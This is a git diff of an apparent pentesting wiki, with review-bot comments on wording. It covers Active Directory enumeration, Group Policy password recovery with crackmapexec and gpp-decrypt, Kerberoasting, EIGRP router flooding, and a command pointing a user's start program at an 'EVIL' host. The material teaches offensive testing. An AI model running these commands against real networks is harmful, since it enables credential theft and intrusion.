diff --git a/.gitbook/assets/image (1).png b/.gitbook/assets/image (1).png index 8f45b7fa4..9c0135519 100644 Binary files a/.gitbook/assets/image (1).png and b/.gitbook/assets/image (1).png differ diff --git a/.gitbook/assets/image (2) (1) (2).png b/.gitbook/assets/image (2) (1) (2).png deleted file mode 100644 index 0f8a86733..000000000 Binary files a/.gitbook/assets/image (2) (1) (2).png and /dev/null differ diff --git a/.gitbook/assets/image (2) (1).png b/.gitbook/assets/image (2) (1).png index 866daa163..0f8a86733 100644 Binary files a/.gitbook/assets/image (2) (1).png and b/.gitbook/assets/image (2) (1).png differ diff --git a/.gitbook/assets/image (2).png b/.gitbook/assets/image (2).png index efc07ea78..866daa163 100644 Binary files a/.gitbook/assets/image (2).png and b/.gitbook/assets/image (2).png differ diff --git a/.gitbook/assets/image (3) (1) (1) (2).png b/.gitbook/assets/image (3) (1) (1) (2).png deleted file mode 100644 index 371b81139..000000000 Binary files a/.gitbook/assets/image (3) (1) (1) (2).png and /dev/null differ diff --git a/.gitbook/assets/image (3) (1) (1).png b/.gitbook/assets/image (3) (1) (1).png index 357f8f6e1..371b81139 100644 Binary files a/.gitbook/assets/image (3) (1) (1).png and b/.gitbook/assets/image (3) (1) (1).png differ diff --git a/.gitbook/assets/image (3) (1).png b/.gitbook/assets/image (3) (1).png index 0903dcf0c..357f8f6e1 100644 Binary files a/.gitbook/assets/image (3) (1).png and b/.gitbook/assets/image (3) (1).png differ diff --git a/.gitbook/assets/image (3).png b/.gitbook/assets/image (3).png index 1defaaff1..0903dcf0c 100644 Binary files a/.gitbook/assets/image (3).png and b/.gitbook/assets/image (3).png differ diff --git a/.gitbook/assets/image (37) (1).png b/.gitbook/assets/image (37) (1).png new file mode 100644 index 000000000..540b55ef0 Binary files /dev/null and b/.gitbook/assets/image (37) (1).png differ 
diff --git a/.gitbook/assets/image (37).png b/.gitbook/assets/image (37).png index 540b55ef0..efc07ea78 100644 Binary files a/.gitbook/assets/image (37).png and b/.gitbook/assets/image (37).png differ diff --git a/.gitbook/assets/image (38) (1).png b/.gitbook/assets/image (38) (1).png new file mode 100644 index 000000000..bcf09b809 Binary files /dev/null and b/.gitbook/assets/image (38) (1).png differ diff --git a/.gitbook/assets/image (38).png b/.gitbook/assets/image (38).png index bcf09b809..8f45b7fa4 100644 Binary files a/.gitbook/assets/image (38).png and b/.gitbook/assets/image (38).png differ diff --git a/.gitbook/assets/image (4) (1) (2) (1).png b/.gitbook/assets/image (4) (1) (2) (1).png deleted file mode 100644 index 07983c822..000000000 Binary files a/.gitbook/assets/image (4) (1) (2) (1).png and /dev/null differ diff --git a/.gitbook/assets/image (4) (1) (2).png b/.gitbook/assets/image (4) (1) (2).png index 769cb6b20..07983c822 100644 Binary files a/.gitbook/assets/image (4) (1) (2).png and b/.gitbook/assets/image (4) (1) (2).png differ diff --git a/.gitbook/assets/image (4) (1).png b/.gitbook/assets/image (4) (1).png index 3269b7f67..769cb6b20 100644 Binary files a/.gitbook/assets/image (4) (1).png and b/.gitbook/assets/image (4) (1).png differ diff --git a/.gitbook/assets/image (4).png b/.gitbook/assets/image (4).png index aa2d624c1..3269b7f67 100644 Binary files a/.gitbook/assets/image (4).png and b/.gitbook/assets/image (4).png differ diff --git a/.gitbook/assets/image (41) (1).png b/.gitbook/assets/image (41) (1).png new file mode 100644 index 000000000..8e8243c54 Binary files /dev/null and b/.gitbook/assets/image (41) (1).png differ diff --git a/.gitbook/assets/image (41).png b/.gitbook/assets/image (41).png index 8e8243c54..aa2d624c1 100644 Binary files a/.gitbook/assets/image (41).png and b/.gitbook/assets/image (41).png differ 
diff --git a/.gitbook/assets/image.png b/.gitbook/assets/image.png index 9c0135519..1defaaff1 100644 Binary files a/.gitbook/assets/image.png and b/.gitbook/assets/image.png differ diff --git a/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md b/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md index c7f65c361..41ad44840 100644 --- a/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md +++ b/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md @@ -105,7 +105,7 @@ Thus, after establishing the neighborhood, we know about the existence of these **I have found that generating and quickly sending out mass EIGRP hello packets overloads the router’s CPU, which in turn can open the door to a DoS attack.** I have developed a little [**helloflooding.py**](https://github.com/in9uz/EIGRPWN/blob/main/helloflooding.py) **** script, but it seems to me that the script lacks the speed of sending out the packets. **It’s caused by GIL**, which prevents the **sprayhello** function from running in multiple threads per second. **Eventually I’ll rewrite the script in C.** -
+
Arguments of the script: @@ -173,7 +173,7 @@ Script arguments: The essence of this attack is to provoke the sending of a huge number of false routes, which will overflow the routing table. This depletes the computing resources of the router, namely the CPU and RAM, since the injections occur at enormous speed. This attack is implemented [**routingtableoverflow.py**](https://github.com/in9uz/EIGRPWN/blob/main/routingtableoverflow.py) **script** -
+
Script arguments @@ -187,7 +187,7 @@ in9uz@Inguz:~$ sudo python3 routingtableoverflow.py --interface eth0 --as 1 --sr After running the script, the routing table starts overflowing with routes. The random addresses of the target networks are due to the use of **RandIP()** in [**Scapy**](https://github.com/secdev/scapy). -

Routing table overflows on GW1 router

+

Routing table overflows on GW1 router

Overloaded router CPU

diff --git a/network-services-pentesting/8089-splunkd.md b/network-services-pentesting/8089-splunkd.md index 914641604..9dbc4dd29 100644 --- a/network-services-pentesting/8089-splunkd.md +++ b/network-services-pentesting/8089-splunkd.md @@ -94,7 +94,7 @@ We need the `.bat` file, which will run when the application is deployed and exe The next step is to choose `Install app from file` and upload the application. -
+
Before uploading the malicious custom app, let's start a listener using Netcat or [socat](https://linux.die.net/man/1/socat). diff --git a/network-services-pentesting/pentesting-smb.md b/network-services-pentesting/pentesting-smb.md index 3d47b3ef2..5107f94dd 100644 --- a/network-services-pentesting/pentesting-smb.md +++ b/network-services-pentesting/pentesting-smb.md @@ -307,6 +307,13 @@ Snaffler.exe -s -d domain.local -o snaffler.log -v data sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares' ``` +Specially interesting from shares are the files called **`Registry.xml`** as they **may contain passwords** for users configured with **autologon** via Group Policy. Or **`web.config`** files as they contains credentials. + +{% hint style="info" %} +The **SYSVOL share** is **readable** by all authenticated users in the domain. In there you may **find** many different batch, VBScript, and PowerShell **scripts**.\ +You should **check** the **scripts** inside of it as you might **find** sensitive info such as **passwords**. +{% endhint %} + ## Read Registry You may be able to **read the registry** using some discovered credentials. Impacket **`reg.py`** allows you to try: diff --git a/windows-hardening/active-directory-methodology/README.md b/windows-hardening/active-directory-methodology/README.md index 538e1f946..2f6f62900 100644 --- a/windows-hardening/active-directory-methodology/README.md +++ b/windows-hardening/active-directory-methodology/README.md 
@@ -225,24 +225,9 @@ If you have managed to enumerate the active directory you will have **more email ### **Looks for Creds in Computer Shares** -Now that you have some basic credentials you should check if you can **find** any **interesting files being shared inside the AD**. You could do that manually but it's a very boring repetitive task (and more if you find hundreds of docs you need to check).\ -You can get help from automatic tools such as: +Now that you have some basic credentials you should check if you can **find** any **interesting files being shared inside the AD**. You could do that manually but it's a very boring repetitive task (and more if you find hundreds of docs you need to check). -* [**Snaffler**](https://github.com/SnaffCon/Snaffler)**** - -```bash -Snaffler.exe -s -d domain.local -o snaffler.log -v data -``` - -* [**CrackMapExec**](https://wiki.porchetta.industries/smb-protocol/spidering-shares) spider. - * `-M spider_plus [--share ]` - * `--pattern txt` - -```bash -sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares' -``` - -Specially interesting from shares are the files called `Registry.xml` as they **may contain passwords** for users configured with **autologon** via Group Policy. +****[**Follow this link to learn about tools you could use.**](../../network-services-pentesting/pentesting-smb.md#domain-shared-folders-search)**** ### Steal NTLM Creds diff --git a/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md b/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md index 4f4751cfa..8269035b1 100644 --- a/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md +++ b/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md 
@@ -493,7 +493,7 @@ Then, we change back the `userPrincipalName` of `Jane` to be something else, lik Now, if we try to authenticate with the certificate, we will receive the NT hash of the `Administrator@corp.local` user. You will need to add `-domain ` to your command line since there is no domain specified in the certificate. -
+
## Weak Certificate Mappings - ESC10 @@ -538,7 +538,7 @@ Notice that the `userPrincipalName` in the certificate is `Administrator`. Then, we change back the `userPrincipalName` of `Jane` to be something else, like her original `userPrincipalName` `Jane@corp.local`. -
+
Now, if we try to authenticate with the certificate, we will receive the NT hash of the `Administrator@corp.local` user. You will need to add `-domain ` to your command line since there is no domain specified in the certificate. diff --git a/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md b/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md index b707c667b..d54aa5651 100644 --- a/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md +++ b/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md @@ -83,7 +83,7 @@ In the previous flow it was used the trust hash instead of the **clear text pass The cleartext password can be obtained by converting the \[ CLEAR ] output from mimikatz from hexadecimal and removing null bytes ‘\x00’: -![](<../../.gitbook/assets/image (2) (1) (2).png>) +![](<../../.gitbook/assets/image (2) (1).png>) Sometimes when creating a trust relationship, a password must be typed in by the user for the trust. In this demonstration, the key is the original trust password and therefore human readable. As the key cycles (30 days), the cleartext will not be human-readable but technically still usable. diff --git a/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md b/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md index 62e7f8d1f..b6cb03c1e 100644 --- a/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md +++ b/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md @@ -104,7 +104,7 @@ netsh advfirewall firewall add rule name=fwd dir=in action=allow protocol=TCP lo Now establish the session, which will forward us to **the first server**. -
+
#### winrs.exe @@ -116,7 +116,7 @@ winrs -r:http://bizintel:5446 -u:ta\redsuit -p:2600leet hostname Like `Invoke-Command`, this can be easily scripted so the attacker can simply issue system commands as an argument. A generic batch script example _winrm.bat_: -
+
### OpenSSH @@ -136,11 +136,11 @@ Download the latest [OpenSSH Release zip from github](https://github.com/PowerSh Uncompress the zip to where you’d like. Then, run the install script - `Install-sshd.ps1` -
+
Lastly, just add a firewall rule to **open port 22**. Verify the SSH services are installed, and start them. Both of these services will need to be running for SSH to work. -
+
If you receive a `Connection reset` error, update permissions to allow **Everyone: Read & Execute** on the root OpenSSH directory. diff --git a/windows-hardening/basic-powershell-for-pentesters/powerview.md b/windows-hardening/basic-powershell-for-pentesters/powerview.md index 08e84f5d5..d21934593 100644 --- a/windows-hardening/basic-powershell-for-pentesters/powerview.md +++ b/windows-hardening/basic-powershell-for-pentesters/powerview.md @@ -18,7 +18,7 @@ The most up-to-date version of PowerView will always be in the dev branch of Pow ### Quick enumeration -```bash +```powershell Get-NetDomain #Basic domain info #User info Get-NetUser -UACFilter NOT_ACCOUNTDISABLE | select samaccountname, description, pwdlastset, logoncount, badpwdcount #Basic user enabled info @@ -51,7 +51,7 @@ Invoke-ACLScanner -ResolveGUIDs | select IdentityReferenceName, ObjectDN, Active ### Domain info -```bash +```powershell # Domain Info Get-Domain #Get info about the current domain Get-NetDomain #Get info about the current domain @@ -76,7 +76,7 @@ Get-ForestDomain ### Users, Groups, Computers & OUs -```bash +```powershell # Users ## Get usernames and their groups Get-DomainUser -Properties name, MemberOf | fl @@ -105,6 +105,9 @@ Get-NetUser -AllowDelegation -AdminCount #All privileged users that aren't marke Get-ObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? { ($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') } +# Users with PASSWD_NOTREQD set in the userAccountControl means that the user is not subject to the current password policy +## Users with this flag might have empty passwords (if allowed) or shorter passwords +Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol #Groups Get-DomainGroup | where Name -like "*Admin*" | select SamAccountName 
@@ -141,7 +144,7 @@ Get-NetOU StudentMachines | %{Get-NetComputer -ADSPath $_} #Get all computers in ### Logon and Sessions -```bash +```powershell Get-NetLoggedon -ComputerName #Get net logon users at the moment in a computer (need admins rights on target) Get-NetSession -ComputerName #Get active sessions on the host Get-LoggedOnLocal -ComputerName #Get locally logon users at the moment (need remote registry (default in server OS)) @@ -149,12 +152,14 @@ Get-LastLoggedon -ComputerName #Get last user logged on (needs admi Get-NetRDPSession -ComputerName #List RDP sessions inside a host (needs admin rights in host) ``` -### GPOs +### Group Policy Object - GPOs -```bash +If an attacker has **high privileges over a GPO** he could be able to **privesc** abusing it by **add permissions to a user**, **add a local admin user** to a host or **create a scheduled task** (immediate) to perform an action.\ +For [**more info about it and how to abuse it follow this link**](../active-directory-methodology/acl-persistence-abuse.md#gpo-delegation). + +```powershell #GPO -Get-DomainGPO | select displayName -## Get-DomainGPO and Get-NetGPO are similar +Get-DomainGPO | select displayName #Check the names for info Get-NetGPO #Get all policies with details Get-NetGPO | select displayname #Get the names of the policies Get-NetGPO -ComputerName #Get the policy applied in a computer 
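Review bot: Grammar in the added GPO paragraph: "he could be able to privesc abusing it by add permissions to a user, add a local admin user to a host or create a scheduled task (immediate)" should read "could escalate privileges by abusing it to add permissions to a user, add a local admin user to a host, or create an (immediate) scheduled task". The hunk also deletes the comment "## Get-DomainGPO and Get-NetGPO are similar", which is what told the reader why both cmdlets are listed back to back; keep it, or fold it into the new "#Check the names for info" comment. The new heading "Group Policy Object - GPOs" should be plural ("Group Policy Objects") to match its abbreviation, and the link text "more info about it and how to abuse it follow this link" reads better as "more info about it and how to abuse it, follow this link".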
@@ -166,6 +171,13 @@ Get-DomainObjectAcl -SearchBase "CN=Policies,CN=System,DC=dev,DC=invented,DC=io" # Enumerate permissions for GPOs where users with RIDs of > 1000 have some kind of modification/control rights Get-DomainObjectAcl -LDAPFilter '(objectCategory=groupPolicyContainer)' | ? { ($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$') -and ($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner')} | select ObjectDN, ActiveDirectoryRights, SecurityIdentifier | fl +# Get permissions a user/group has over any GPO +$sid=Convert-NameToSid "Domain Users" +Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid} + +# COnvert GPO GUID to name +Get-GPO -Guid 18E5A689-E67F-90B2-1953-198ED4A7F532 + # Transform SID to name ConvertFrom-SID S-1-5-21-3263068140-2042698922-2891547269-1126 @@ -187,7 +199,7 @@ Learn how to **exploit permissions over GPOs and ACLs** in: ### ACL -```bash +```powershell #Get ACLs of an object (permissions of other objects over the indicated one) Get-ObjectAcl -SamAccountName -ResolveGUIDs @@ -210,7 +222,7 @@ Get-NetGroupMember -GroupName "Administrators" -Recurse | ?{$_.IsGroup -match "f ### Shared files and folders -```bash +```powershell Get-NetFileServer #Search file servers. Lot of users use to be logged in this kind of servers Find-DomainShare -CheckShareAccess #Search readable shares Find-InterestingDomainShareFile #Find interesting files, can use filters @@ -218,7 +230,7 @@ Find-InterestingDomainShareFile #Find interesting files, can use filters ### Domain Trust -```bash +```powershell Get-NetDomainTrust #Get all domain trusts (parent, children and external) Get-DomainTrust #Same Get-NetForestDomain | Get-NetDomainTrust #Enumerate all the trusts of all the domains found 
@@ -237,7 +249,7 @@ Get-DomainForeignGroupMember #Get groups with privileges in other domains inside ### L**ow**-**hanging fruit** -```bash +```powershell #Check if any user passwords are set $FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl @@ -277,7 +289,7 @@ Invoke-UserHunter -Stealth ### Deleted objects -```bash +```powershell #This isn't a powerview command, it's a feature from the AD management powershell module of Microsoft #You need to be in the AD Recycle Bin group of the AD to list the deleted AD objects Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties * @@ -287,19 +299,19 @@ Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties * #### SID to Name -```bash +```powershell "S-1-5-21-1874506631-3219952063-538504511-2136" | Convert-SidToName ``` #### Kerberoast -```bash +```powershell Invoke-Kerberoast [-Identity websvc] #Without "-Identity" kerberoast all possible users ``` #### Use different credentials (argument) -```bash +```powershell # use an alterate creadential for any function $SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) @@ -308,7 +320,7 @@ Get-DomainUser -Credential $Cred #### Impersonate a user -```bash +```powershell # if running in -sta mode, impersonate another credential a la "runas /netonly" $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) 
@@ -319,7 +331,7 @@ Invoke-RevertToSelf #### Set values -```bash +```powershell # set the specified property for the given user identity Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose # Set the owner of 'dfm' in the current domain to 'harmj0y' diff --git a/windows-hardening/lateral-movement/dcom-exec.md b/windows-hardening/lateral-movement/dcom-exec.md index 6d0f9f4f7..133a8791e 100644 --- a/windows-hardening/lateral-movement/dcom-exec.md +++ b/windows-hardening/lateral-movement/dcom-exec.md @@ -34,12 +34,12 @@ It is then possible to invoke the `ExecuteShellCommand` method to start a proces The **MMC20.Application** object lacked explicit “[LaunchPermissions](https://technet.microsoft.com/en-us/library/bb633148.aspx)”, resulting in the default permission set allowing Administrators access: -![](<../../.gitbook/assets/image (4) (1) (2) (1).png>) +![](<../../.gitbook/assets/image (4) (1) (2).png>) You can read more on that thread [here](https://twitter.com/tiraniddo/status/817532039771525120).\ Viewing which other objects that have no explicit LaunchPermission set can be achieved using [@tiraniddo](https://twitter.com/tiraniddo)’s [OleView .NET](https://github.com/tyranid/oleviewdotnet), which has excellent Python filters (among other things). In this instance, we can filter down to all objects that have no explicit Launch Permission. When doing so, two objects stood out to me: `ShellBrowserWindow` and `ShellWindows`: -![](<../../.gitbook/assets/image (3) (1) (1) (2).png>) +![](<../../.gitbook/assets/image (3) (1) (1).png>) Another way to identify potential target objects is to look for the value `LaunchPermission` missing from keys in `HKCR:\AppID\{guid}`. An object with Launch Permissions set will look like below, with data representing the ACL for the object in Binary format: 
diff --git a/windows-hardening/windows-local-privilege-escalation/README.md b/windows-hardening/windows-local-privilege-escalation/README.md index 4268de8d1..7c79df86c 100644 --- a/windows-hardening/windows-local-privilege-escalation/README.md +++ b/windows-hardening/windows-local-privilege-escalation/README.md @@ -1154,6 +1154,12 @@ Search in `C:\ProgramData\Microsoft\Group Policy\history` or in _**C:\Documents gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw ``` +Using crackmapexec to get the passwords: + +```shell-session +crackmapexec smb 10.10.10.10 -u username -p pwd -M gpp_autologin +``` + ### IIS Web Config ```bash diff --git a/windows-hardening/windows-local-privilege-escalation/juicypotato.md b/windows-hardening/windows-local-privilege-escalation/juicypotato.md index 4eff80a4f..9674f8114 100644 --- a/windows-hardening/windows-local-privilege-escalation/juicypotato.md +++ b/windows-hardening/windows-local-privilege-escalation/juicypotato.md @@ -115,7 +115,7 @@ c:\Users\Public> ### Launch a new CMD (if you have RDP access) -![](<../../.gitbook/assets/image (37).png>) +![](<../../.gitbook/assets/image (37) (1).png>) ## CLSID Problems
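Review bot: Grammar in the paragraph added by the pentesting-smb.md hunk: "Specially interesting from shares are the files called Registry.xml" should read "Especially interesting among the shared files are those called Registry.xml", and "web.config files as they contains credentials" should read "as they may contain credentials" (the hedge already used for Registry.xml fits here too, since a web.config only sometimes holds credentials). The paragraph names the files but not how the stored passwords are recovered; the `gpp-decrypt` block and the added `crackmapexec ... -M gpp_autologin` line in the windows-local-privilege-escalation hunk of this same patch are that step, so a cross-link from this paragraph would save the reader a search.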
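Review bot: The replacement line in the active-directory-methodology README hunk wraps the link in stray empty bold markers, `****[**Follow this link to learn about tools you could use.**](...)****`; the leading and trailing `****` are GitBook editor residue and render as literal asterisks or empty emphasis, so drop them. The hunk also removes "You can get help from automatic tools such as:" together with the Snaffler and CrackMapExec commands, leaving the paragraph to end on "hundreds of docs you need to check)." with no lead-in before the link; keep a short sentence such as "Automatic tools can help:" ahead of it. Finally, the target `pentesting-smb.md#domain-shared-folders-search` depends on a heading with exactly that slug existing in pentesting-smb.md, which this patch does not show; confirm the anchor resolves.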
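Review bot: In the lines added under "# Get permissions a user/group has over any GPO" in powerview.md, `Get-GPO -Guid ...` is a cmdlet from Microsoft's GroupPolicy RSAT module, not PowerView, and needs a comment saying so, the way the "Deleted objects" section already flags `Get-ADObject` as "not a powerview command". Fix the typo "COnvert GPO GUID to name", and mark the GUID `18E5A689-E67F-90B2-1953-198ED4A7F532` as an example value or swap in one of the page's own. `Convert-NameToSid` is the legacy PowerView name (the dev branch keeps it only as an alias of `ConvertTo-SID`), while the same block uses `ConvertFrom-SID` two lines later; using the `ConvertTo-SID` / `ConvertFrom-SID` pair keeps the naming consistent with the dev-branch guidance at the top of the file.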
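Review bot: The crackmapexec block added to windows-local-privilege-escalation/README.md is fenced as ```shell-session while the adjacent blocks in the same file (the `gpp-decrypt` block just above and the IIS Web Config block just below) use ```bash; pick one tag for the file. The intro line "Using crackmapexec to get the passwords" should also say which passwords: the `gpp_autologin` module reads the autologon credentials stored in Registry.xml (the file the pentesting-smb.md hunk of this patch calls out), whereas the encrypted value handed to `gpp-decrypt` above comes from the other Group Policy Preferences XML files, which CrackMapExec covers with its separate `gpp_password` module; naming both modules here avoids the reader concluding that `gpp_autologin` replaces the `gpp-decrypt` step.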